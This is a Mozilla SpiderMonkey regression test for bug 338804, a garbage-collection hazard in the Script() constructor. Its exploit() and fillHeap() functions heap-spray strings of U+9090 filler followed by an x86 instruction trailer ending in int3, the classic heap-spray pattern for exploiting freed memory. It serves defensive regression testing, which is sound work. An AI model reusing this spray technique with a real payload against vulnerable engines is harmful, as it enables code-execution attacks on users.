/* -*- indent-tabs-mode: nil; js-indent-level: 2 -*- */
/* This Source Code Form is subject to the terms of the Mozilla Public
 * License, v. 2.0. If a copy of the MPL was not distributed with this
 * file, You can obtain one at http://mozilla.org/MPL/2.0/. */

//-----------------------------------------------------------------------------
// Harness globals consumed by reportCompare() at the end of this file.
var BUGNUMBER = 338804;
var summary = 'GC hazards in constructor functions';
// `actual` is never reassigned anywhere in this file, so the comparison at
// the bottom passes whenever execution gets that far: the failure mode this
// regression test guards against is a crash during exploit(), not a value
// mismatch.
var actual = 'No Crash';
var expect = 'No Crash';

// printBugNumber/printStatus are provided by the surrounding test harness,
// not defined in this file.
printBugNumber(BUGNUMBER);
printStatus (summary);
printStatus ('Uses Intel Assembly');

// <script>
// Regression test for the SpiderMonkey Script() GC hazard (bug 338804).
//
// `scale` is the number of strings fillHeap() keeps alive per phase. It is a
// tuning value that differed between the builds the hazard was originally
// reproduced on:
//  BonEcho/2.0a2: 3000
//  Firefox/1.5.0.4: 2000
//
// `rooter` is (re)populated by fillHeap(); presumably it is kept global so
// the strings it holds remain reachable while Script() is still running.
var rooter;
var scale = 2000;

// Runs at load time. `exploit` is a function declaration further down in the
// file, so it is hoisted and already callable here.
exploit();
/*
  Alternative entry point kept for reference: defer the run when a timer API
  (setTimeout) exists, otherwise run immediately as above.

  if(typeof(setTimeout) != "undefined") {
  setTimeout(exploit, 2000);
  } else {
  exploit();
  }
*/

/**
 * Drives the regression test. Script() is a non-standard SpiderMonkey
 * constructor; when the running shell does not provide it the test is
 * skipped (and, since `actual` is untouched, still reported as 'No Crash').
 *
 * Otherwise Script() is invoked twice with an object whose toString is
 * fillHeap(), so that fillHeap() runs — presumably via string conversion of
 * the argument — while the constructor is still executing, which is the
 * window in which bug 338804's GC hazard was observed.
 */
function exploit() {
  if (typeof Script === 'undefined') {
    print('Test skipped. Script not defined.');
    return;
  }
  // Two separate objects on purpose: each call gets its own toString host.
  Script({ toString: fillHeap });
  Script({ toString: fillHeap });
}

/**
 * Builds the string that fillHeap() replicates across the heap.
 *
 * The result is 512 code units of U+9090 as filler followed by the six-unit
 * trailer whose bytes are the instruction sequence noted below. The trailer
 * ends in int3, so — presumably — if the hazard under test ever makes the
 * engine treat freed memory holding this string as code, the process traps
 * right away instead of continuing silently, which is what lets the
 * harness's 'No Crash' expectation detect a regression.
 *
 * @returns {string} a fresh 518-code-unit payload (identical on every call)
 */
function createPayload() {
  // Array(513).join(x) yields 512 copies of x, the same as doubling x 9 times.
  var filler = Array(513).join("\u9090");
  /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
  var trailer = "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
  return filler + trailer;
}

/**
 * Runs as the toString of the object handed to Script() (see exploit()).
 *
 * Side effect: replaces the global `rooter` with 2 * scale strings that stay
 * referenced from it — first `scale` cumulative concatenations of the payload
 * (lengths growing by one payload each), then `scale` short distinct strings
 * of the payload plus its index. Reads the globals `scale` and `rooter` and
 * calls createPayload().
 *
 * @returns {string} "" so the caller's string conversion is trivial
 */
function fillHeap() {
  rooter = [];
  var payload = createPayload();
  var block = "";
  var limit = scale * 2;
  var idx = 0;
  // Phase 1: ever-longer strings, each one payload longer than the last.
  while (idx < scale) {
    block += payload;
    rooter[idx] = block;
    idx++;
  }
  // Phase 2: many small, distinct strings (index appended) up to 2 * scale.
  while (idx < limit) {
    rooter[idx] = payload + idx;
    idx++;
  }
  return "";
}

// </script>
 
// Harness check. `actual` was never reassigned above, so this reports a pass
// whenever execution reaches here; the regression being guarded against is a
// crash inside exploit(), which would prevent this line from running at all.
reportCompare(expect, actual, summary);